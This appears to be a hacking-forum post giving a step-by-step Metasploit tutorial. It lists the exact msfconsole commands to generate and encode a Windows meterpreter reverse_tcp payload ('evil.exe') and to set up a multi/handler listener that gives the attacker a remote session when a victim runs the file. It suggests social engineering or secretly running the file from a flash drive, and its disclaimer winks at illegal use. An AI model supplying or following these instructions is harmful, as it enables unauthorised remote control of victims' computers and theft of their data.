Hello all, I was browsing the tutorials section and didn't see anything that mentioned metasploit, so I took it upon myself to write one. This isn't to horribly in depth, and no, I do not know everything there ever is to know about metasploit or how it works, I just know how to use it. So, lets get started shall we!
What exactly is metasploit? Metasploit is a framework used for storing, deploying, and creating exploits. An exploit is a piece of code which can interact with other programs to let the attacker (you) execute bits of code on the victims computer. It also has a wonderful tool known as msfpayload.
What is msfpayload?msf payload is used in conjunction with msfcli and msfenocde. Together, they are a set of tools which creates a file that connects back to your computer, encodes the file, and sets up a listener for said file. This method completely bypasses the need for exploits, but requires social engineering skills to somehow get your file on their computer and for them to execute it. (or just sneak a flash drive in while their not looking and execute it for them, but I don't recommend that.) Sounds great right? so how do you do it?
||Tutorial starts here|| I will be using Backtrack 5 R3, and using msfconsole.
To start it off, update msf by starting a terminal and running "msfupdate". It will say "Updated to revision #####" when finished.
Now execute "msfconsole" (which will take a few moments to load.
After it shows the msf banner, it will give you the msf prompt "<u>msf</u> >.
Type "show payloads". This gives you a list of all the payloads available. We are going to use windows/meterpreter/reverse_tcp
Type "use windows/meterpreter/reverse_tcp" and it will bring you into that module. type "info" to see what options are required and other useful information.
We see that there are three options needed, EXITFUNC, LHOST, and LPORT. EXITFUNC is just how the program will show up on windows, don't really need to care about that. LHOST is your IP address, so the program will know where to connect back to, and LPORT is the port it will connect back on. EXITFUNC and LPORT already have default values placed in them, which work fine and we don't need to change.
LHOST on the other hand, does need an option. This is your IP address. If you are performing this over a LAN network, then you just need your LAN IP, such as 192.168.2.5. If you are performing this over WAN, use your WAN address and have correct port forwarding (and pray nobody traces it back to you). We set LHOST by typing "set LHOST 192.168.2.5". If we run "info" again it shows our LHOST as the ip we put in.
So with all that in order, now we just type "generate -e x86/shikata_ga_nai -i 30 -t exe -f evil.exe" which will create the file in your Home folder. Take that file, and copy it on to a flash drive.
Now for the second part (much quicker then the first). Go back to your terminal and type "back", to be brought back to the main msf menu.
We are going to use the handler to listen for connections, so type "use exploit/multi/handler" to set the module.
Now to set the options, type exactly in the following in order:
set PAYLOAD windows/meterpreter/reverse_tcp (the payload we generated earlier)
set LHOST 192.168.2.5 (your ip address, whatever that may be)
set LPORT 4444 (the default port)
exploit
and the handler is started. When somebody executes that file we made earlier, it connects back to your computer, and the listener we just created handles that connect back. When somebody executes it, you will have a session created. Just type "sessions 1" and you will connect.
||End Tutorial|| Disclaimer: Only use this on YOUR computers, doing this without permission on other peoples computers is ILLEGAL. Since I know your going to ignore that anyways, just phrase your questions in a way that sounds legal. I am not the metasploit guru, I will attempt to answer questions to the best of my ability, but you are probably better off googling it.
I encoded the file in shikata_ga_nai 30 times, but this will not get past the antivirus. There are ways to code it and encrypt it so it will, but we all have our ways of doing it, and sharing secrets never works
Hope you enjoy, hope it makes sense, just reply to it if there is anything you think should be changed.
Thanks, corrupted_fear
